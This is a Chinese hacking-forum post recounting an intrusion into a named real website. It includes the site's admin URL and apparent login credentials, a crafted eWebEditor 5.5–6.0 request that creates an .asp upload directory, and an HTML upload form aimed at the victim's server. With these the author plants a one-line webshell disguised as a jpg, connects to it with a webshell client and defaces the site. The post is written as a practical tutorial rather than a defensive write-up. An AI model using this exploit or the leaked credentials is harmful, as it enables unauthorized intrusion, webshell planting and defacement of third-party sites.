首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>入侵实例>文章内容
利用ewebeditor 5.5 - 6.0 鸡肋漏洞拿shell
来源:www.qianbi.tk 作者:铅笔 发布时间:2010-12-10  

首发:听雨安全论坛
个人博客www.qianbi.tk
曾经在听雨看到过 一个 0day
ewebeditor 5.5 - 6.0 鸡肋漏洞
但是一直搞不明白为什么是鸡肋、
但是。、今天就是这个鸡肋帮我拿下了shell
群里唐宋大牛 。

丢了一个后台、地址:
http://www.htysmt.com/admin/
admin
htysmt

然后进去看了看。后台上传是没有用的。数据库又找不到。插不进去一句话、。

正在思考呢。哇操。大牛把shell丢出来了。我了个草的。果然是大牛。这时候呢。我想看看自己的水平有多高捏。

于是就有了这个、。

后台的上传是 ewebeditor 编辑器、能找到后台、账号密码木有、

查看后台、得到ewebeditor 地址、

然后得到地址


可是在这里的时候思路断了一下、是大牛提醒我的 这个有个0day、

然后就告诉我了、我寻思着论坛上也没有哪个0day的教材、

小弟不才、拿出来演示一下、献丑了、

得到地址之后、很简单的、

我们构造这样一个页面

http://www.htysmt.com/admin/eweb ... upcusdir=a.asp

这样会在   网站目录下生产 a.asp这个文件、



然后再本地构造html
<form action="http://www.htysmt.com/admin/ewebeditor/asp/upload.asp?action=savetype=image&style=popup&cusdir=a.asp" method=post name=myform enctype="multipart/form-data">
<input type=file name=uploadfile size=100><br><br>
<input type=submit value=upload>
</form>

然后打开


我是上传的一句话(jpg格式)

然后菜刀链接。

最后 挂个txt 闪人。



 
[推荐] [评论(2条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·另类网站入侵之一句话木马图片的
·0day批量拿站webshell,挖掘机是
·OmniPeek抓包的一点看法
·Windows系统密码破解全攻略
·破解禁止SSID广播
·XSS偷取密码Cookies通用脚本
·Intel 3945ABG用OmniPeek 4.1抓
·破解无线过滤MAC
·XSS漏洞基本攻击代码
·强大的嗅探工具ettercap使用教程
·KesionCMS V7.0科汛内容网站管理
·Metasploit 权限提升
  相关文章
·星外虚拟机系统(星外虚拟机提权"
·对搜狐、网易和TOM三大门户网站
·一次有意思的提权(G6FTP )
·渗透技巧总结
·通过后台抓包备份拿webshell渗透
·社会工程+老式提权艰难渗透某通
·艰难渗透源码出售站点(图文)
·典型性社会工程学渗透实战(图文
·oracle低权限下获取shell
·GRE数据包注入攻击
·暴力破解asp一句话[php版]
·一次欺骗带来的血案--入侵实录
  推荐广告
CopyRight © 2002-2019 VFocuS.Net All Rights Reserved